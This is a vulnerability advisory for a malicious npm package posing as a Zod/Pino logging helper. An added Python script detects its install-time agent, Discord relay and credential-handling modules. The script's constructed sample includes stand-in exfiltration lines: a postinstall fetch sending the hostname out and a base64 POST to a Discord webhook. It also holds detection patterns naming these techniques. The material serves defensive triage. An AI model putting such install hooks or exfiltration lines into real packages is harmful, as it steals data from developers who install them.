npm

zod-pino@1.0.127

Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC

Malicious

OSV ID

MAL-2026-6273

Ecosystem

npm

Summary

The package is published under a name suggesting a Pino logger integration for Zod, but the tarball contents do not match that purpose and exhibit multiple installer-harm fingerprints:

- scripts/postinstall-agent.mjs runs at install time and performs outbound network activity (GET requests, ping/host probing, identifier collection). A logging-schema package has no legitimate reason to ship a postinstall agent that beacons out.
- dist/discordRelayUpload.js implements POST-based upload flows with base64 encoding/decoding of payloads and host-reachability probes (ping): a Discord-channel relay used for off-host data delivery, unrelated to the package's advertised purpose.
- dist/secretScan/contentScanner.js and dist/secretScan/agentStartupAudit.js implement a secret-scanning routine that fetches huggingface.co endpoints from an "agent startup audit" code path, with base64 buffer handling consistent with credential extraction and transmission.
- dist/hfCredentials.js handles base64-encoded Hugging Face credentials, and dist/deploymentDefaults.js plus scripts/encode-deployment.mjs perform multi-stage base64 decoding of deployment payloads, a typical staged-payload obfuscation pattern.
- dist/relayServer.js bundles a long-lived relay/server component with repeated host-probe (ping) primitives.

Taken together (an install-time agent with outbound traffic, secret-scanning and credential modules, base64-staged deployment payloads, and a Discord upload relay, all in a package nominally advertised as a zod/pino integration), the shipped behavior matches an exfiltration/relay toolchain rather than a logging utility. Installing this package triggers the postinstall agent automatically: any `npm install` that resolves this version runs the agent unless lifecycle scripts are disabled (`npm install --ignore-scripts`, or `ignore-scripts=true` in .npmrc).

Source: amazon-inspector (c536e5a7ee3d5542e1ac822b30ba4525e52b2ae0c964d0c2470468d91b9b41c8)
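The fingerprints above (an install hook plus network, host-probe, base64-staging and relay-endpoint code in a package whose advertised purpose needs none of them) can be checked on the tarball before anything is installed. The script below is an added example written for this page; it is not part of the OSV record, of the reporting scanner, or of the package, and it does not contain the real tarball. It packs two constructed npm-style tarballs (one mimicking the reported file layout, one benign), then applies the lifecycle-hook and content heuristics to each. The regexes, labels and verdict thresholds are assumptions chosen for illustration, not a published detection ruleset.

```python
"""Triage an npm tarball for the installer-harm fingerprints described above.

Added example: heuristics and thresholds are illustrative assumptions.
"""
import io
import json
import re
import tarfile

# npm lifecycle hooks that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Content fingerprints modelled on the report. Each one is legitimate in some
# package; the signal is their combination with an install hook in a package
# whose advertised purpose (a logging/schema helper) needs none of them.
FINGERPRINTS = {
    "outbound-http": re.compile(r"\b(?:fetch|axios|got|https?\.(?:get|request))\s*\(", re.I),
    "host-probe": re.compile(r"\bping\b", re.I),
    "base64-decode": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\s*\)|\batob\s*\(", re.I),
    "discord-relay": re.compile(r"discord(?:app)?\.com/api/webhooks", re.I),
    "hf-endpoint": re.compile(r"huggingface\.co", re.I),
    "identifier-collection": re.compile(r"\bos\.(?:hostname|userInfo|networkInterfaces)\s*\(", re.I),
}
# Labels that mean code can push data off the host.
EXFIL_LABELS = {"outbound-http", "discord-relay", "hf-endpoint"}


def triage(tarball_bytes: bytes) -> dict:
    """Return install hooks, per-file fingerprint hits and a verdict for an npm tarball."""
    hooks, hits = {}, {}
    with tarfile.open(fileobj=io.BytesIO(tarball_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            data = tar.extractfile(member).read()
            # npm tarballs place every file under a top-level "package/" directory.
            path = member.name.split("/", 1)[1] if "/" in member.name else member.name
            if path == "package.json":
                scripts = json.loads(data).get("scripts", {})
                hooks = {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}
                continue
            text = data.decode("utf-8", errors="replace")
            labels = sorted(name for name, rx in FINGERPRINTS.items() if rx.search(text))
            if labels:
                hits[path] = labels
    all_labels = {label for labels in hits.values() for label in labels}
    if hooks and all_labels & EXFIL_LABELS:
        verdict = "block"    # code runs at install time and can reach the network
    elif hooks or all_labels & EXFIL_LABELS:
        verdict = "review"   # one of the two halves of the pattern; needs a human look
    else:
        verdict = "allow"
    return {"install_hooks": hooks, "hits": hits, "verdict": verdict}


def build_tarball(files: dict) -> bytes:
    """Pack {path: content} into an npm-style gzipped tarball with the package/ prefix."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo("package/" + path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample mimicking the layout described in the report; not the real tarball.
SUSPICIOUS = build_tarball({
    "package.json": json.dumps({"name": "zod-pino", "version": "1.0.127",
                                "scripts": {"postinstall": "node scripts/postinstall-agent.mjs"}}),
    "scripts/postinstall-agent.mjs":
        "import os from 'node:os';\nconst id = os.hostname();\n"
        "await fetch('https://example.invalid/?id=' + id);\n",
    "dist/discordRelayUpload.js":
        "const body = Buffer.from(payload, 'base64');\n"
        "fetch('https://discord.com/api/webhooks/x/y', {method: 'POST', body});\n",
    "dist/index.js": "module.exports = { zodPino: () => null };\n",
})

# Constructed benign sample: a library with no install hooks and no network code.
BENIGN = build_tarball({
    "package.json": json.dumps({"name": "tiny-lib", "version": "0.1.0",
                                "scripts": {"test": "node test.js"}}),
    "dist/index.js": "module.exports = (x) => x + 1;\n",
})

if __name__ == "__main__":
    for name, tb in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, json.dumps(triage(tb), indent=2))
```

To run this against a real package, fetch the tarball with `npm pack <name>@<version>` (add `--ignore-scripts` so no lifecycle script runs on your machine while you are still deciding) and pass the bytes of the resulting .tgz to `triage`. The verdict is a triage aid, not a classifier: a `review` result on a package that genuinely needs a build step or a network client is expected, and the point of the `block` rule is precisely the report's conclusion that an install-time hook and exfiltration primitives together, in a package that should need neither, are enough to stop the install pending manual inspection.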
